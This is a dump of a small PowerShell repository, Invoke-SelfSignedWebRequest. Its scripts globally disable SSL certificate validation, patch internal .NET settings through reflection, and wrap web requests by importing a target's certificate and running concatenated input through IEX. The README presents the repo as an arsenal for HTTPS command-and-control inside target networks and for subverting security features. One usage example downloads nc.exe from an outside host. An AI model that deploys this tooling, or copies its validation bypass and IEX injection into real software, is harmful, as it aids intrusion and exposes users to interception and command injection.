├── Disable-CertificateValidation.ps1 ├── Disable-NetSSLValidation.ps1 ├── Invoke-SelfSignedWebRequest.ps1 └── README.md /Disable-CertificateValidation.ps1: -------------------------------------------------------------------------------- 1 | function Disable-CertificateValidation 2 | { 3 | <# 4 | .SYNOPSIS 5 | Disables SSL certificate validation through the ServicePointManager 6 | .DESCRIPTION 7 | Disables SSL certificate validation through the System.Net.ServicePointManager endpoint by manually configuring the ServerCertificateValidationCallback to return $true. Allows (New-Object System.Net.WebClient).DownloadFile() to connect to self-signed SSL domains. 8 | 9 | Author: Matthew Toussain (@0sm0s1z) 10 | License: BSD 3-Clause 11 | 12 | .EXAMPLE 13 | Disable-CertificateValidation 14 | 15 | .LINK 16 | https://github.com/0sm0s1z/Invoke-SelfSignedWebRequest 17 | #> 18 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} 19 | 20 | } 21 | Disable-CertificateValidation 22 | -------------------------------------------------------------------------------- /Disable-NetSSLValidation.ps1: -------------------------------------------------------------------------------- 1 | function Disable-NetSSLValidation 2 | { 3 | <# 4 | .SYNOPSIS 5 | Configures internal .NET settings to disable SSL certificate validation 6 | .DESCRIPTION 7 | Configures internal .NET settings to disable SSL certificate validation via useUnsafeHeaderParsing 8 | 9 | Author: Matthew Toussain (@0sm0s1z) 10 | License: BSD 3-Clause 11 | 12 | .EXAMPLE 13 | . .\Disable-NetSSLValidation.ps1 14 | Disable-NetSSLValidation 15 | 16 | .LINK 17 | https://github.com/0sm0s1z/Invoke-SelfSignedWebRequest 18 | #> 19 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} 20 | 21 | $netAssembly = [Reflection.Assembly]::GetAssembly([System.Net.Configuration.SettingsSection]) 22 | 23 | if($netAssembly) 24 | { 25 | $bindingFlags = [Reflection.BindingFlags] "Static,GetProperty,NonPublic" 26 | $settingsType = $netAssembly.GetType("System.Net.Configuration.SettingsSectionInternal") 27 | 28 | $instance = $settingsType.InvokeMember("Section", $bindingFlags, $null, $null, @()) 29 | 30 | if($instance) 31 | { 32 | $bindingFlags = "NonPublic","Instance" 33 | $useUnsafeHeaderParsingField = $settingsType.GetField("useUnsafeHeaderParsing", $bindingFlags) 34 | 35 | if($useUnsafeHeaderParsingField) 36 | { 37 | $useUnsafeHeaderParsingField.SetValue($instance, $true) 38 | } 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /Invoke-SelfSignedWebRequest.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-SelfSignedWebRequest 2 | { 3 | <# 4 | .SYNOPSIS 5 | Performs web requests without certificate validation 6 | .DESCRIPTION 7 | Loads the target URI's SSL certificate into the local certificate store and wraps Invoke-WebRequest. Removes certificate upon completion of insecure WebRequest invocation. Aliased to wget-ss 8 | 9 | Author: Matthew Toussain (@0sm0s1z) 10 | License: BSD 3-Clause 11 | 12 | .EXAMPLE 13 | Invoke-SelfSignedWebRequest https://spectruminfosec.com/nc.exe "-outfile nc.exe" 14 | wget-ss https://spectruminfosec.com/index.php 15 | 16 | .LINK 17 | https://github.com/0sm0s1z/Invoke-SelfSignedWebRequest 18 | #> 19 | 20 | [CmdletBinding()] 21 | param( 22 | [uri][string]$url, 23 | [string]$cmdstr 24 | ) 25 | 26 | Set-StrictMode -Version 3 27 | 28 | if($url.Scheme -ne "https") { 29 | #Direct to WebRequest 30 | $newWebRequest = "Invoke-WebRequest $url $cmdstr" 31 | IEX $newWebRequest 32 | } else { 33 | 34 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} 35 | 36 | #Grab target SSL Certificate 37 | $webRequest = [System.Net.HttpWebRequest]::Create($url) 38 | try { $webRequest.GetResponse().Dispose() } catch {} 39 | $cert = $webRequest.ServicePoint.Certificate 40 | $bytes = $cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert) 41 | $fname = $url.host 42 | $savePath = "$pwd\$fname.key" 43 | set-content -value $bytes -encoding byte -path $savePath 44 | 45 | #Save to disk 46 | $importCert = new-object System.Security.Cryptography.X509Certificates.X509Certificate2 47 | $importCert.import($savePath) 48 | 49 | #Load into local CurrentUser Store 50 | $store = Get-Item "cert:\CurrentUser\My" 51 | $store.open("MaxAllowed") 52 | $store.add($importCert) 53 | $store.close() 54 | 55 | #Wrap Invoke-WebRequest 56 | $newWebRequest = "Invoke-WebRequest $url $cmdstr" 57 | IEX $newWebRequest 58 | 59 | #Remove Cert & Clear Validation Callback 60 | Get-ChildItem -Path "cert:\CurrentUser\My" -DnsName $fname | Remove-Item -force -confirm:0 61 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $null 62 | } 63 | } 64 | New-Alias wget-ss Invoke-SelfSignedWebRequest 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #Invoke-SelfSignedWebRequest 2 | 3 | For InfoSec work, using HTTPS is an incredibly handy mechanism for C2 and maneuver within target network space. Further PowerShell is an amazing productivity tool that can help an operator achieve dynamic results. A natural next conclusion is to combine the C2 channel (HTTPS) with the effects generator (PowerShell). Just spawn up a quick self-signed cert and life is hunky dory, right? Unfortunately, as it turns out Microsoft (and by extension PowerShell) really doesn't like SSL connections secured by certificates that can't be validated. They go out of their way to PREVENT these connections by throwing heinous levels of ERROR messaging. 4 | This repo exists as a quick and dirty arsenal of methods and scripts to subvert those security focused features and press on with the hack! 5 | 6 | My intent is to add on new methods as the come to mind. Pull requests welcome! 7 | 8 | ##Methods: 9 | * Invoke-SelfSignedWebRequest - Loads the target URI's SSL certificate into the local certificate store and wraps Invoke-WebRequest. Removes certificate upon completion of insecure WebRequest invocation. Aliased to wget-ss 10 | 11 | * Disable-CertificateValidation - Disables SSL certificate validation through the System.Net.ServicePointManager endpoint by manually configuring the ServerCertificateValidationCallback to return $true. Allows (New-Object System.Net.WebClient).DownloadFile() to connect to self-signed SSL domains. 12 | 13 | * Disable-NetSSLValidation - Configures internal .NET settings to disable SSL certificate validation via useUnsafeHeaderParsing 14 | 15 | 16 | Author: Matthew Toussain (@0sm0s1z) 17 | License: BSD 3-Clause 18 | 19 | --------------------------------------------------------------------------------